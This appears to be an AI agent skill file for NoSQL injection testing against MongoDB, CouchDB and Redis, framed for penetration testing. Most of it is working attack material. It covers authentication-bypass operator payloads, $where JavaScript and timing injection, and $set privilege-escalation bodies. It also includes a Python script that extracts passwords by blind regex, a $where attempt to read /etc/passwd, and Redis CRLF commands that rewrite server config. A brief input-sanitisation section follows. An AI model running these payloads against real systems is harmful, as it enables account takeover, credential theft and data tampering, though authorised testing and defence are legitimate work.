Tests NoSQL database APIs for injection vulnerabilities targeting MongoDB, CouchDB, Redis, and other NoSQL backends. Use when target uses NoSQL database, when JSON input accepted, or when asked to "test MongoDB", "NoSQL injection", or "test document database".
Identify and exploit injection vulnerabilities in NoSQL database-backed APIs.
507f1f77bcf86cd799439011.find(), .aggregate() error messages// Normal request
POST /api/login
{
"username": "admin",
"password": "password123"
}
// Injection - $ne (not equal)
{
"username": "admin",
"password": {"$ne": ""}
}
// Injection - $gt (greater than)
{
"username": "admin",
"password": {"$gt": ""}
}
// Injection - $regex
{
"username": "admin",
"password": {"$regex": ".*"}
}
VULNERABLE: Login succeeds without valid password SECURE: Error or rejected request
// Test if user exists using $regex
{
"username": {"$regex": "^a"},
"password": {"$ne": ""}
}
// Binary search for usernames
{
"username": {"$regex": "^admin"},
"password": {"$ne": ""}
}
// Using $where clause
{
"username": "admin",
"$where": "1==1"
}
// Sleep-based detection
{
"username": "admin",
"$where": "sleep(5000)"
}
// Data extraction via timing
{
"username": "admin",
"$where": "this.password.match(/^a/) ? sleep(5000) : 1"
}
// Character-by-character extraction
{
"username": "admin",
"password": {"$regex": "^p"}
}
// Response differs when match found
// Extract hex/special chars
{
"password": {"$regex": "^[a-f0-9]"}
}
// Bypass array checks
{
"items": {"$elemMatch": {"$gt": ""}}
}
// $in operator
{
"status": {"$in": ["active", "deleted", "admin"]}
}
// Inject additional fields
{
"username": "user",
"role": "admin",
"$set": {"isAdmin": true}
}
// MongoDB update injection
{
"username": "user",
"$set": {"password": "hacked"}
}
#!/usr/bin/env python3
"""MongoDB Blind Extraction via $regex"""
import requests
import string
URL = "https://target.com/api/login"
CHARSET = string.ascii_letters + string.digits + "_"
def extract_field(field_name, known_prefix=""):
"""Extract field value character by character"""
result = known_prefix
while True:
found = False
for char in CHARSET:
payload = {
"username": "admin",
field_name: {"$regex": f"^{result}{char}"}
}
resp = requests.post(URL, json=payload)
if "success" in resp.text or resp.status_code == 200:
result += char
print(f"[+] Found: {result}")
found = True
break
if not found:
break
return result
# Usage
password = extract_field("password")
print(f"[+] Extracted password: {password}")
// CouchDB view injection
GET /db/_design/docs/_view/all?startkey="a"&endkey="z"
// Mango query injection
POST /db/_find
{
"selector": {
"password": {"$regex": ".*"}
}
}
# SSRF to Redis
curl "https://target.com/api/cache?key=test\r\nCONFIG SET dir /var/www/html\r\n"
# Via newline injection
key=test%0d%0aSET%20pwned%20true
| Payload | Purpose | Database |
|---|---|---|
{"$ne": ""} | Always true | MongoDB |
{"$gt": ""} | Always true | MongoDB |
{"$regex": ".*"} | Match all | MongoDB |
{"$where": "1==1"} | JavaScript injection | MongoDB |
{"$nin": []} | Empty array bypass | MongoDB |
{"$exists": true} | Field exists | MongoDB |
Request:
POST /api/auth/login
Content-Type: application/json
{
"email": "[email protected]",
"password": {"$ne": null}
}
Response:
{
"token": "eyJhbGciOiJIUzI1NiIs...",
"user": {"role": "admin"}
}
Result: CRITICAL - Authentication bypassed using $ne operator
Attack sequence:
1. {"password": {"$regex": "^a"}} → 401
2. {"password": {"$regex": "^s"}} → 200 ✓
3. {"password": {"$regex": "^se"}} → 200 ✓
4. {"password": {"$regex": "^sec"}} → 200 ✓
...
Final: password = "secretPassword123"
Result: HIGH - Password extracted via blind regex injection
Request:
POST /api/users/search
{
"$where": "return (this.isAdmin && (function(){var fs=require('fs'); return fs.readFileSync('/etc/passwd')}()))"
}
Response:
MongoError: ReferenceError: require is not defined
Result: MEDIUM - JavaScript execution context confirmed, sandboxed
// Reject MongoDB operators in input
function sanitizeInput(input) {
if (typeof input === 'object') {
for (let key of Object.keys(input)) {
if (key.startsWith('$')) {
throw new Error('Invalid input');
}
}
}
return input;
}
// Instead of:
db.users.find({username: req.body.username})
// Use:
const username = String(req.body.username);
db.users.find({username: username})
// MongoDB config